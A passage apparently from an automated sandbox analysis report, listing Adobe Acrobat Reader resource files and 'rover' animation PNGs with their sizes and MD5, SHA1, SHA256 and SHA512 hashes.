                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\themes\dark\illustrations.png
                                                      Filesize

                                                      8KB

                                                      MD5

                                                      f6e318123e7ad5933a49669eb035c737

                                                      SHA1

                                                      ed8938fa3c13af75978bbd0bcdd3e8bd40a02004

                                                      SHA256

                                                      19f68990146444907956056019aaee514c522c3c00ae00604da44a1bec2f8f51

                                                      SHA512

                                                      b2506a283dbdcf40ba0cac63b4fd0249463218cc9511ce52cae5ab8c36706090fc1f1942f1082204dcdad5d80e7b655d9e12326c820ac21f64a508999e130743

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\js\nls\ui-strings.js
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      d59d8ff7aaa17ee875adbe48b7a77e78

                                                      SHA1

                                                      7405acc07f6137b7fd9575f99a2b4354135956ef

                                                      SHA256

                                                      d74c0782682efde01c1c30e46814256f7d16d7df00a7167d90f2bd55ebaab626

                                                      SHA512

                                                      63fc8bef9e8ef833e45d99f954a9eb99d6bbcae39b2eca8a7000ac11b976cdd0ce0581e5e5e6b2f1bb2bdc911e31690e503dad945f0a3ea702dfe404896eded8

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\pages-app\images\example_icons.png
                                                      Filesize

                                                      683B

                                                      MD5

                                                      a0522ef468697e74b90c444ceb4aa17a

                                                      SHA1

                                                      31fa5bb9b4ada150c9001b6e9f3213644117187f

                                                      SHA256

                                                      57804748e775c08ae188b4d860f31e4482ab99b44ed1d8489780daa6756fb11c

                                                      SHA512

                                                      bbb91f8b3c204c4c04da2ad635eb18e9f224f73395dac509c438c0a645316162b6ff78e03e7af76d5da2d9e84cd0c4b5e9db1d4dc08bc3f524bcc55c1f4dbbd3

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\pages-app\images\example_icons2x.png
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      99a1fefa123aa745b30727cc5ad50126

                                                      SHA1

                                                      c48f74cee78f8ed8463634d80c4112f3e12bd566

                                                      SHA256

                                                      7a610114be56ff131462bc67f9a23bcd4fde4fdd0158691448ab9e4a3eb2ca3b

                                                      SHA512

                                                      504800f03a4aa57c1cfa15b28542382728b5f3dd85309fe12ebfd711980d78d15d8241d5f54956ee41da2cd65203b7764ab7b15119457b74ebc07fcf8e55a742

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\search-summary\js\nls\ui-strings.js
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      3dde11f8594519f004ded2687db9b90e

                                                      SHA1

                                                      fcf1854df851616a25d7cf1439a9120b16902420

                                                      SHA256

                                                      196c132938d324c62184ddc85bdb1cd642af830712e0fbf0fb3230978316d510

                                                      SHA512

                                                      adc2cb3a37dbf5fe2ae79f5752c0d38d2427a95e333e848ffa113046f630eaa967b3cb29c049dcdd9b921d57e23392562d779c24207f770aba6e92392064f17b

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\task-handler\js\nls\fi-fi\ui-strings.js
                                                      Filesize

                                                      823B

                                                      MD5

                                                      5e884e2f05ac036b7a6cded3efc2ea2d

                                                      SHA1

                                                      807c1cf1bf0943404601b6241bf4bcf9fcc29c9e

                                                      SHA256

                                                      b333de3a4a7be7749b82302085ed26ad868f0f8eccd09d2a8bb8840414e624d6

                                                      SHA512

                                                      6665aa6fa35e05d01a4a2312a93faf52d6b39409bfaa861c187b0cc2fc51e74aa253ebf56061872d548cb6d3d7bbf1f7c2568de81e5287e0a1d6591c1e780f15

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\css\home-selector.css
                                                      Filesize

                                                      802B

                                                      MD5

                                                      bfeb063e064c71e44ce75898e79c61bc

                                                      SHA1

                                                      c4dcb4b6814cbee53b415a2a5df02fa500510ef3

                                                      SHA256

                                                      af439ebb0d55750003f7dbec517e7b0b26a6a0506b21e3b74d800cd1c7faa004

                                                      SHA512

                                                      0835ebe63867fba6d69a25c83dca767ffd9c57907ba76d9c71012be18510e2145a358d37c1cf4e4ad35d1cdd4f67ffd5928e70e18a376db607d8482356f12219

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      4c27ad089d04cfefd979d56f2a67b172

                                                      SHA1

                                                      63289f9198ee4553759b07de7a4229ad370fa976

                                                      SHA256

                                                      e34bcd5b8436d3bc45f98dd913d41f185c6b06326b66937d6e0d5c6434b16fe7

                                                      SHA512

                                                      23f9283f769fd310dcac26cac00d2eb033763d73bd45b0d148ea1ec3a3c75b073572c9fa9234699372a7e1caad7fcde7629d004815536df1d39d291f2d2d96a9

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      61bd39ed095fa82ffd334fbd7982616c

                                                      SHA1

                                                      51af9c2cd42743c5cf81200e0fba3cfaff801885

                                                      SHA256

                                                      237a70fe0388ce6884f5424692c460625691ef7acb0bf80403ec6b25f348b94a

                                                      SHA512

                                                      54dd8e1a5c19a9d51892a12e9501b7f6f69e09e0c446ec36f7ddfd9ad0d9cef52604ab2f8071c71ce63989510a703f1cfd5492e1ac20c8b37258ba21f8952400

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      543415ad8ba14db1b75a93a551a4abfc

                                                      SHA1

                                                      3d4737451e899240fe19daa07f3c58ce9a623631

                                                      SHA256

                                                      03bcfd7fcbd98e48b1954f912ecd66ce0bd5c181da0c2408beed01486ed23804

                                                      SHA512

                                                      7c4bd1cf6fc8d7aeedb1c666ca45c95615927fe76cad3d3c4f4dafc987f4ac04f527ecaebb3103f593eb080302e768fcd77739ce8344ff2e7ec10efdd1113cd0

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png
                                                      Filesize

                                                      385B

                                                      MD5

                                                      c789d387908d7b7f21c6474a86e84019

                                                      SHA1

                                                      1c36fc6954178c43d9249a5ff3c7246057c6aead

                                                      SHA256

                                                      223f32512aec50c1c00fafc476d8e4ce61e79aa748c67b72fe55514882a31a5a

                                                      SHA512

                                                      1cab85dff119b591046049b69b6208283ca5e009d95129bb407df2768c82da30fd2af8debf6f1bbd91f37518538f3ba6bcda32b63d1d278b56fdd1f5f93439ca

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png
                                                      Filesize

                                                      1003B

                                                      MD5

                                                      c5aab3d175e0a3753ed2c3bbd7b929c1

                                                      SHA1

                                                      3ebee0101ad62449a67f506df9c8e7dacc39f877

                                                      SHA256

                                                      2e187b74e926afe70eafe0648c7125817e99f5586eee3e2e05446e360d4cc1bd

                                                      SHA512

                                                      e967020462477c3e9465e3383c544cf468dd89f4da084193634f5bcdc001b90f5bad3f4f6dda9e95ebe068108986daf41504e02331f4922ea25e7ffee1f27040

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      808971f45b803583d9d1f812803d81b7

                                                      SHA1

                                                      0f6aaecba7c976ed8c2f53782b3d3148f41b2905

                                                      SHA256

                                                      c25d9409ddf9645c2731ec785cacbb7568005bfc78fe0aec7df3ae3c4d30e333

                                                      SHA512

                                                      121e6b01125f9e9d4894f7d498bb4d39ce676ce51e29cbcd148e0c1feed46fbc58267cea7d5f66654be831dc479e4643be8b28b005467309b7df5cc7fbcd0dbe

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      ad68c0b141ea1dbfcadb540c1817289f

                                                      SHA1

                                                      548a46167f7f5193c5a1335753bc208bf92aa504

                                                      SHA256

                                                      537ac64cd204d7ef82cfe41c932deb9cb1ae738b2156eff4dbf73208384c0a13

                                                      SHA512

                                                      269ae39458a9f30351166f304825b777f3ff143b7914b98e83e01600fa04c7790e6e813466c2a1c5396ce13cd2199792905cf0baba1cd28a420440efce0843e8

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small.png
                                                      Filesize

                                                      289B

                                                      MD5

                                                      36503740756a442b7be294947462be83

                                                      SHA1

                                                      a1203ae869deb46f59a3273f6d130e7457bf5321

                                                      SHA256

                                                      d188ab283c552eee50677129f3b0ffd8d97828c4e7007bea258174c9a2200e87

                                                      SHA512

                                                      6ff98b15c7d757dd351bf50a1c4ac759a73fdafe03d5fad506478550987d0ec016ba9e617c099e6bf7b0263846eddc4eb32cb70fb1fbbc1189791defe556967a

                                                      Download Submit
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js
                                                      Filesize

                                                      840B

                                                      MD5

                                                      32147da1c647161e45a1004eb1b16349

                                                      SHA1

                                                      a953c222cce91729ebab36bddd43bd5a795a69cc

                                                      SHA256

                                                      434731fdc6d2f5115c5f7786ac989fedef7d0f60cd2ad4385cc98f6d2160566c

                                                      SHA512

                                                      8c825f8d38519cdac2a49e4ee8a9564ae72839199562ce9acfe72b4fbb94f8946775054782cf26a9566eaf8cf944a26e42b7b372c4e7349b33a8e17dcd13df94

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.001.png
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      8d0dfb878717f45062204acbf1a1f54c

                                                      SHA1

                                                      1175501fc0448ad267b31a10792b2469574e6c4a

                                                      SHA256

                                                      8cf6a20422a0f72bcb0556b3669207798d8f50ceec6b301b8f0f1278b8f481f9

                                                      SHA512

                                                      e4f661ba8948471ffc9e14c18c6779dba3bd9dcc527d646d503c7d4bdff448b506a7746154380870262902f878275a8925bf6aa12a0b8c6eb8517f3a72405558

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.002.png
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      da104c1bbf61b5a31d566011f85ab03e

                                                      SHA1

                                                      a05583d0f814685c4bb8bf16fd02449848efddc4

                                                      SHA256

                                                      6b47ad7fe648620ea15b9c07e62880af48a504b83e8031b2521c25e508aa0ef1

                                                      SHA512

                                                      a8e27abefb0f5bfffe15a19fd882b2e112687abe6ac4bbd5187036cb6058b0124d6ce76fc9227970c8fe2f5768aa0d1faa3319d33b1f42413e8bdfe2ce15296d

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.004.png
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      f57ff98d974bc6b6d0df56263af5ca0d

                                                      SHA1

                                                      2786eb87cbe958495a0113f16f8c699935c74ef9

                                                      SHA256

                                                      9508d82995364556a882c54306210e885868a8df2f2ad93485c14f88c9f9e1b7

                                                      SHA512

                                                      1d4ca268d1c98ac545008b079076609e18bfdf22cd31b7b75b9218d03c6edb37b245298ff717e48309ca862f973a4383b101e43732a162b4d7f78573612c64ea

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.005.png
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      7fb2e99c5a3f7a30ba91cb156ccc19b7

                                                      SHA1

                                                      4b70de8bb59dca60fc006d90ae6d8c839eff7e6e

                                                      SHA256

                                                      40436d5ab3589d33dae09b470ccacd369422d2569804cf1532e5946fc7e45535

                                                      SHA512

                                                      c0d83325928d629abba648360c8687091d18d52991297d69625ccd4617d4d5add4aa16c288cc408b26c79cd37decf5ee2198e8b87b67ef5b88802afae93fb51a

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.006.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      a49c8996d20dfb273d03d2d37babd574

                                                      SHA1

                                                      96a93fd5aa1d5438217f17bffbc26e668d28feaf

                                                      SHA256

                                                      f4c568336894b3140f0ca7005a5751ad5a860422290b2b6e23d72656160862b1

                                                      SHA512

                                                      9abb666891fa00ae77801fe9b3aab62bca37402197d22983e98d8442e6d890b1091a47dc1eca1ac68caa52a633bb60c8c3248de65056a6435f4affb98f401a30

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.007.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      e65884abe6126db5839d7677be462aba

                                                      SHA1

                                                      4f7057385928422dc8ec90c2fc3488201a0287a8

                                                      SHA256

                                                      8956643da83aa74bc89b4d71db7b470200863de230be647a6881d8f3f60df3ac

                                                      SHA512

                                                      7285b8acca0210a85dd4317a7beab161708544c4c25a742ce7284b545fa4953be89eb685e62f30fba56d6cb2fc806062ccdf4a0e62516eea047097c6856900c2

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.008.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      f355305ada3929ac1294e6c38048b133

                                                      SHA1

                                                      a488065c32b92d9899b3125fb504d8a00d054e0e

                                                      SHA256

                                                      37de9b0126ffa3967455083dd72ba70501b1e4c92ae25eb0667f840911585775

                                                      SHA512

                                                      6082003d98022597007623ff7cdece9d9a14ad19bf55ac35afb2277fe22378c865899a5b28b4b5828d0d48fb7859fea82886d98d8d3a3813413f1e864e3849b2

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.009.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      1d812d808b4fd7ca678ea93e2b059e17

                                                      SHA1

                                                      c02b194f69cead015d47c0bad243a4441ec6d2cd

                                                      SHA256

                                                      e4e2fe6652557dec0e703da7325808cab4722961398dc9bf9fdae36c1de8841d

                                                      SHA512

                                                      a8781c78d7d23f70f7450e749732d2909447cfa194d8e49a899c77f808e735878da8d838eecb4e8db7470d040800ae45f977d5f208bfad6c15d62d6456611e84

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.010.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      e0436699f1df69af9e24efb9092d60a9

                                                      SHA1

                                                      d2c6eed1355a8428c5447fa2ecdd6a3067d6743e

                                                      SHA256

                                                      eeae94fa4ddca88b0fefec2e449064ea1c6d4c8772762bb900dc7752b68706e4

                                                      SHA512

                                                      d6b4adf98c9deb784be1f775a138a7252b558b9d9443a8a3d1435043196738b1ea32439cd09c507d0e2a074a5ba2973e7ffce6c41b26e17460b7695428666cbf

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.011.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      f45528dfb8759e78c4e933367c2e4ea8

                                                      SHA1

                                                      836962ef96ed4597dbc6daa38042c2438305693a

                                                      SHA256

                                                      31d92998e8e9de48700039027a935b5de3242afd4938e6b10509dc87d84eb758

                                                      SHA512

                                                      16561ca527e2081519decbc0fb04b9955b398eb97db7a3d442500b6aefcb4e620bebd87d7c8ddad2cf940035710fc5a000b59d7ed5d0aa06f3af87e9eebcb523

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.012.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      195bb4fe6012b2d9e5f695269970fce5

                                                      SHA1

                                                      a62ef137a9bc770e22de60a8f68b6cc9f36e343b

                                                      SHA256

                                                      afa59cb80b91e29360a95746979be494bdee659d9b8bfad65782b474273d5e62

                                                      SHA512

                                                      8fbe3ca2950261d976b80efd6a8d36d4a47b445a3e4669e100ce8c5d2a1f692e7b40ab324494a6de7847861d99194e13344a84aa135e458924b95fadf3905fd4

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.013.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      3c0ef957c7c8d205fca5dae28b9c7b10

                                                      SHA1

                                                      4b5927bf1cf8887956152665143f4589d0875d58

                                                      SHA256

                                                      3e6a44a4e993d70a2f8409b4194fa15551d5f7a3651a5d1e74d3c6b640da08c7

                                                      SHA512

                                                      bf2a5dd182c7cce4f6d00a4a1738f3a777b61c612c2449716b0fa62c62570ca1c21ac0063c221923e5db3b4101a4e7e32e711c9bfa075a2949ea9fa2e51ca704

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.014.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      2445d5c72c6344c48065349fa4e1218c

                                                      SHA1

                                                      89df27d1b534eb47fae941773d8fce0e0ee1d036

                                                      SHA256

                                                      694d6774638b36148f7a1b14809a025a16895ad4ec8645a6db2fe9cd5f784dbb

                                                      SHA512

                                                      d8134a66845c71d633f56e5fd656d545f09dad82d18ec21a7415f825cb6c0634ed775008c6fdea83dfec95ce659144e6de806edac620f389fcc3064683c3a7b3

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.015.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      678d78316b7862a9102b9245b3f4a492

                                                      SHA1

                                                      b272d1d005e06192de047a652d16efa845c7668c

                                                      SHA256

                                                      26fab597e882c877562abea6b13557c60d3ed07fd359314cdc3a558f8224266b

                                                      SHA512

                                                      cb6154e67ea75612dddd426e448f78c87946b123ff7b81f3fc83444adac4692bb5f3a04038291d9df7e102a301e41541a10e709e8adfde376016d86de15087db

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.016.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      aa4c8764a4b2a5c051e0d7009c1e7de3

                                                      SHA1

                                                      5e67091400cba112ac13e3689e871e5ce7a134fe

                                                      SHA256

                                                      1da7b39ec5f3cad19dc66f46fee90c22a5a023a541eca76325074bee5c5a7260

                                                      SHA512

                                                      eea254f7327639999f68f4f67308f4251d900adb725f62c71c198d83b62aa3215f2ce23bd679fddde6ac0c40a5c7b6b04800bc069f2940e21e173b830d5762e2

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.017.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      7c216e06c4cb8d9e499b21b1a05c3e4a

                                                      SHA1

                                                      d42dde78eb9548de2171978c525194f4fa2c413c

                                                      SHA256

                                                      0083bb52df2830f2fc0e03ffa861728916e3f1a6db3560e66adbca9716318ee3

                                                      SHA512

                                                      6ffbcc1c6ad1a0c01a35fdbf14918dfc9e2026a3021e3b6d761d56f4006b4218ffc2278eb2f820ae54722cd0c35fde40ca715154f6e2ae6c24aef0724d0ed004

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.018.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      e17061f9a7cb1006a02537a04178464d

                                                      SHA1

                                                      810b350f495f82587134cdf16f2bd5caebc36cf5

                                                      SHA256

                                                      9049038f58e048cc509bcc51434119465c376700ec45bedfd1d8f45440bdc32a

                                                      SHA512

                                                      d5b899109a16195d3fdb8f23382b48bab70dfcd0c823a03a0cdc4e50501812fc644b938839c3346e8aabc2925ce3bdebffad07ef2f90d291663275ba3d225ab3

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Come\Come.019.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      63dbf53411402e2a121c3822194a1347

                                                      SHA1

                                                      86a2e77e667267791054021c459c1607c9b8dbb6

                                                      SHA256

                                                      47b80b828244964005bd947b80958f3aa6372b843dc088e33fbbd35ab3f785c5

                                                      SHA512

                                                      4b4603d88bddcb86e4282dafd55d8f00b852464daab588a554db829af566d5aa6baa3d575c58b133276be22203c014de73c0c3e35bfbe53570c356ef47bb5a50

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.001.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      0197012f782ed1195790f9bf0884ca0d

                                                      SHA1

                                                      fc0115826fbaf8cefa478e506b46b7b66a804f13

                                                      SHA256

                                                      c999fa6fd26a4a2af2155bd05522b44b54d6df90d1a9703a288bdf18b623c2cc

                                                      SHA512

                                                      614bce1f761871ba1113de49217725b7b6661c703b03864cef736f44e2d1e0c5fbe133966d24afb15900f0e4da16b24000a2a638b6d7839848874f386b3b81c1

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.002.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      b45ff2750a41e0d8ca6a597fbcd41b57

                                                      SHA1

                                                      cf162e0371a1a394803a1f3145d5e9b7cddd5088

                                                      SHA256

                                                      727a2aac0697bcfecdc56dc4507516f9f64c5faa426f0ce69f7e607b74c4e1f4

                                                      SHA512

                                                      82a9a3fc7dfae0ed6bf665c4f369f053af372551c1871d6b3dc775f447ba727e921ab831f8acd712cc31b66156eac643859404f05386e2592a15954fb78d87a3

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.003.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      95113a3147eeeb845523bdb4f6b211b8

                                                      SHA1

                                                      f817f20af3b5168a61982554bf683f3be0648da1

                                                      SHA256

                                                      800f0c501905bc4257415ee8bed738f897273600c721e80a15bcfbb2e2b3b847

                                                      SHA512

                                                      4e55d9ced90f255b20890595f8e07ccaeedcbe08aed6303336eae7f66df1e50429259b62c556d5d8b179f7f9be22216c1592ba772e2cebd257b3401109f45cc4

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.004.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      8ce29c28d4d6bda14b90afb17a29a7f9

                                                      SHA1

                                                      94a28ce125f63fcd5c7598f7cb9e183732ebdc16

                                                      SHA256

                                                      eb9abbeddd27ce6fa82f1f7437309209450f9f8412eb395923a45d946d9c50b1

                                                      SHA512

                                                      037babd109af1a2c05d7db87536bec41e3075d1120a37384d66f9460d8790be5732f8bbe6a2a13db3d017806fed88945f2a98697b586284b62760252276a8077

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.005.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      83ddcf0464fd3f42c5093c58beb8f941

                                                      SHA1

                                                      e8516b6468a42a450235bcc7d895f80f4f1ca189

                                                      SHA256

                                                      ebb3efda95b2d2588983742f96f51bdbcb9d87a6949f2c37ea11f509d236a536

                                                      SHA512

                                                      51a6925bc9558f9ba232b85623d78f975d1c18c1990ce62153aa57a742e0897c72fc0665213024f8d5af96e56cc47eb384ee8d231910fdef876a0889b52a59d8

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.006.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      6f530b0a64361ef7e2ce6c28cb44b869

                                                      SHA1

                                                      ca087fc6ed5440180c7240c74988c99e4603ce35

                                                      SHA256

                                                      457626948266abd4f0dcda6a09c448bb20cce3596b52076b8d90e1c626037dc9

                                                      SHA512

                                                      dc3d809eab3bfa7c65c35a36d55097e09fbefa2f6de962ae02c58540f6c88b3ca9be3361f3ec37b8ce7927e020463055c455f2e93baa3a3c12096b55abcab6d3

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.007.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      aac6fc45cfb83a6279e7184bcd4105d6

                                                      SHA1

                                                      b51ab2470a1eedad86cc3d93152360d72cb87549

                                                      SHA256

                                                      a59bb83276f003dd149c2143a5a70f012212c709e72af283209adfb85a0835b1

                                                      SHA512

                                                      7020ba8d918398bc2d5e6ea4aaea007d576d4c3577adab80259336505b06e8163d0afde5a7b4d802ba2dab9ec9c757e88eb37780246c35d38e5fed8648bbf3a1

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.008.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      fa73c710edc1f91ecacba2d8016c780c

                                                      SHA1

                                                      19fafe993ee8db2e90e81dbb92e00eb395f232b9

                                                      SHA256

                                                      cca9c6b8e0df9e09523ab59021ffff62b29273cae487335c87b569e8483aaae2

                                                      SHA512

                                                      f73b2ee270348247db1d7fea937cd69125afa6aef926dc5c1cef14b955630711fe106d56270172448d739014ae4fd7d221007aaa422b3625aa524b812baa10a2

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.009.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      3faefb490e3745520c08e7aa5cc0a693

                                                      SHA1

                                                      357ffa8b2d4797d8d6cf67c0c84818ebc746ce0a

                                                      SHA256

                                                      6ba5254c0b10b6939d5cd80f3ab87757143896d20fd8e014c3fcca35657e076b

                                                      SHA512

                                                      714d9d32ab070a992d84dc597a086afb7fe040300c33c25f9acdd27f5f8894145a5f9f8654b522c04a9cb1babeb25000fac25b01b1c820d4cfe8d67e40cd72a7

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.010.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      1bed8b0629ce72b595017371336ac688

                                                      SHA1

                                                      9180c6c3d0bdd3470fa38854de8af238bcc31d42

                                                      SHA256

                                                      a8cc3da0e5b87f10e6acd766bbd096dbe40ca60507867ec8ea66c56436fa6cd7

                                                      SHA512

                                                      4483b0ac1e83ef94f982aa7cf92767a24165060e1d492a87290a2301bcd2654e1c2e5d5cd637151408cac576d74d529b7d05e7e12b27e02afd17e24029a92ceb

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.011.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      c9eccb5ce7e65fd1eff7aba4a6fd43e8

                                                      SHA1

                                                      cd71011e1172a157627e1595cc7ce4888370a765

                                                      SHA256

                                                      a4045f846f5b3bb0856dbfdca78b5871433beefccb1416a2824e8dccce9f5975

                                                      SHA512

                                                      3b07f14cbc06f2a4a75067e09c04c760af324ebe2de5c51c88648b184337aad48d319c2753bc9987ebb2094719d92a0f87d7c0fd84c4d893dd8351e7dc6de3f8

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.012.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      a3bcbf505d81879716178ea1afd3a241

                                                      SHA1

                                                      47125ba19ff6f074ec8af4b6a21d4ce5067a2909

                                                      SHA256

                                                      f8677c74b7aa84bb8cf9857d8714ed24cbc171874e507bc93674e4cd2bbcca22

                                                      SHA512

                                                      2280a522ad0dc4122b55f1ffba90c1a410b225e987512eddfd1aae70012cfef896fa0804048b3147a043a4569aaeea74f658f0f16c2f45c4297644de90710e29

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.013.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      02b9523345fc843b1ce756bcd0290aaf

                                                      SHA1

                                                      3c39dbe3409d4eed12bfaeea4785ebd2e2bce22b

                                                      SHA256

                                                      20e7c6c4dc2b2f751b2df24784ce1d37c193ff0e6dded55855630bb26df23130

                                                      SHA512

                                                      5691fc2ecd00660d36e53aa17fa6a72285ba97f9ce1d4bfa00ae6b9ab66c5e35c084a9236c02fd4fae51e7fa064e34bd259c3fbb581ed768f110cb122dc3becb

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.014.png
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      28a55f46abaaf5be52125dbd818a316e

                                                      SHA1

                                                      3991669f716d5b662c867f47d0e25e45df935801

                                                      SHA256

                                                      d143345b20fe079f75797ce712374c25ff02157de38a21bad164d8be1858347b

                                                      SHA512

                                                      0865d49fba58f2abac0edf3abf23d13d2f2cf645edc8198505f089a336e17256ca14fe73e3f561e125d166b091298517f5ff46b865fa001455ab7414a43dc3f1

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Speak\Speak.015.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      cda2513580858b22a8b32fb074941bb6

                                                      SHA1

                                                      437e54479fa0dceabbaf53b13a82347da70024f0

                                                      SHA256

                                                      9ced59a0ae08603ab736e0d327e7be804baa78325525fb32d60702228d85b166

                                                      SHA512

                                                      f182ac7787ea39e67f55f512ff37ceaddf28e494875be6a17db07e8d1f6d4de12357462d22c589d76bca485d4ea0bfe6441b031cdce82fbd3495aaa5abd20561

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Tired\Tired.001.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      136be0b759f73a00e2d324a3073f63b7

                                                      SHA1

                                                      b3f03f663c8757ba7152f95549495e4914dc75db

                                                      SHA256

                                                      c9b925e1f1409ddaa3aadf1ae7c2fb3310b69fb931190b7dc2f274f517fe38fc

                                                      SHA512

                                                      263911753deffbce295dda3f311225edeb375555b1db2771477167600573bea78719f6294960dc5c5d95885194412dd0f133bae75a30e16556377263165b3723

                                                      Download Submit
                                                    • C:\Program Files (x86)\rover\Tired\Tired.002.png
                                                      Filesize

                                                      4KB

                                                      MD5

                                                      f8f8ea9dd52781d7fa6610484aff1950

